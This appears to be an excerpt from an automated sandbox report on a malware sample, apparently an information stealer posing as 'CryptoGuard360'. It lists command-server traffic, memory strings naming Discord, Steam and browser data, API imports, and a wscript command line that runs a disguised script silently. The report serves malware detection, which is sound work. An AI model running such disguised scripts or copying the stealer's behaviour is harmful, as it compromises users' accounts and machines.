                  Source: global trafficTCP traffic: 192.168.2.5:49974 -> 51.81.129.243:7702
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: unknownTCP traffic detected without corresponding DNS query: 51.81.129.243
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079D889 InternetReadFile,SetEvent,GetLastError,SetEvent,28_2_0079D889
                  Source: global trafficDNS traffic detected: DNS query: kurNPdkiGq.kurNPdkiGq
                  Source: global trafficDNS traffic detected: DNS query: 78.210.14.0.in-addr.arpa
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                  Source: 00000123.exe, updatte.exe.0.drString found in binary or memory: http://james.newtonking.com/projects/json
                  Source: update.exe, 00000006.00000002.2309139595.0000000000408000.00000002.00000001.01000000.00000007.sdmp, update.exe, 00000006.00000000.2282768835.0000000000408000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                  Source: Heroes.com, 00000013.00000000.2366054974.0000000000535000.00000002.00000001.01000000.0000000A.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoScan360.com, 0000001C.00000002.2509765526.00000000007F5000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
                  Source: 00000123.exe, updatte.exe.0.drString found in binary or memory: http://www.newtonsoft.com/jsonschema
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.cloudinary.com
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://icanhazip.com/
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: 00000123.exe, 00000000.00000002.2533339208.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: 00000123.exe, 00000000.00000002.2533038435.0000000001C50000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: MSBuild.exe, 00000025.00000002.2833990069.000000000361C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                  Source: Heroes.com, 00000013.00000003.2694636168.0000000003A59000.00000004.00000020.00020000.00000000.sdmp, Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: Heroes.com, 00000013.00000003.2380255265.000000000388F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                  Source: MSBuild.exe, 00000025.00000002.2842262338.0000000004391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacl
                  Source: MSBuild.exe, 00000025.00000002.2833990069.0000000003478000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                  Source: MSBuild.exe, 00000025.00000002.2833990069.00000000035CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: 00000123.exe, updatte.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_004050CD
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,28_2_0079F7C7
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0079F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,28_2_0079F55C
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,6_2_004044A5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007B9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,28_2_007B9FD2

                  System Summary

                  barindex
                  .NET source code contains very large array initializations
                  Source: 0.2.00000123.exe.717fd00.4.raw.unpack, MISJyPtQaG1dvlqIy9.csLarge array initialization: TZnMwT1qw: array initializer size 360976
                  Drops large PE files
                  Source: C:\Users\user\Desktop\00000123.exeFile dump: updatte.exe.0.dr 265687064Jump to dropped file
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Wscript called in batch mode (surpress errors)
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.js"
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00794763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,28_2_00794763
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00781B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,28_2_00781B4D
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,6_2_00403883
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0078F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,28_2_0078F20D
                  Source: C:\Users\user\AppData\Local\Temp\update.exeFile created: C:\Windows\PotatoDescriptionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeFile created: C:\Windows\UnionUnixJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\update.exeFile created: C:\Windows\ImproveRgJump to behavior
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01B840190_2_01B84019
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01B8EC380_2_01B8EC38
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01B833500_2_01B83350
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4B0280_2_01C4B028
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4D2580_2_01C4D258
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C45BBF0_2_01C45BBF
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4B0240_2_01C4B024
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4D2550_2_01C4D255
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C434880_2_01C43488
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4441C0_2_01C4441C
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C444200_2_01C44420
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C49A840_2_01C49A84
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C49A880_2_01C49A88
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4DF730_2_01C4DF73
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01C4DF780_2_01C4DF78
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA45C80_2_01CA45C8
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA0FA00_2_01CA0FA0
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA21A80_2_01CA21A8
                  Source: C:\Users\user\Desktop\00000123.exeCode function: 0_2_01CA12C70_2_01CA12C7
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_0040497C6_2_0040497C
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_00406ED26_2_00406ED2
                  Source: C:\Users\user\AppData\Local\Temp\update.exeCode function: 6_2_004074BB6_2_004074BB
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0074801728_2_00748017
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0073E14428_2_0073E144
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0072E1F028_2_0072E1F0
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075A26E28_2_0075A26E
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007422A228_2_007422A2
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007222AD28_2_007222AD
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0073C62428_2_0073C624
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075E87F28_2_0075E87F
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007AC8A428_2_007AC8A4
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00792A0528_2_00792A05
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00756ADE28_2_00756ADE
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00788BFF28_2_00788BFF
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0073CD7A28_2_0073CD7A
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0074CE1028_2_0074CE10
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0075715928_2_00757159
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0072924028_2_00729240
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007B531128_2_007B5311
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_007296E028_2_007296E0
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_0074170428_2_00741704
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00741A7628_2_00741A76
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00729B6028_2_00729B60
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00747B8B28_2_00747B8B
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00741D2028_2_00741D20
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00747DBA28_2_00747DBA
                  Source: C:\Users\user\AppData\Local\CryptoGuard360 Scan Elite Systems Inc\GuardianCryptoScan360.comCode function: 28_2_00741FE728_2_00741FE7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03061F2A29_2_03061F2A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_0306237029_2_03062370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_0306238029_2_03062380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03062A2F29_2_03062A2F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03062A5829_2_03062A58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03064AD329_2_03064AD3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03064AD029_2_03064AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_0306298429_2_03062984
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_030629D329_2_030629D3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03065C0029_2_03065C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_03065C1029_2_03065C10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_0306508829_2_03065088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 29_2_0306508829_2_03065088
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0319113137_2_03191131
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_0319114037_2_03191140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05902B6837_2_05902B68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05902B4737_2_05902B47
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A40FFF37_2_05A40FFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A420A837_2_05A420A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A4133737_2_05A41337
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A6730037_2_05A67300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A61C3837_2_05A61C38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A692A037_2_05A692A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A6929037_2_05A69290
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A995A837_2_05A995A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A9494037_2_05A94940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A9959837_2_05A99598
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 37_2_05A98E2037_2_05A98E20
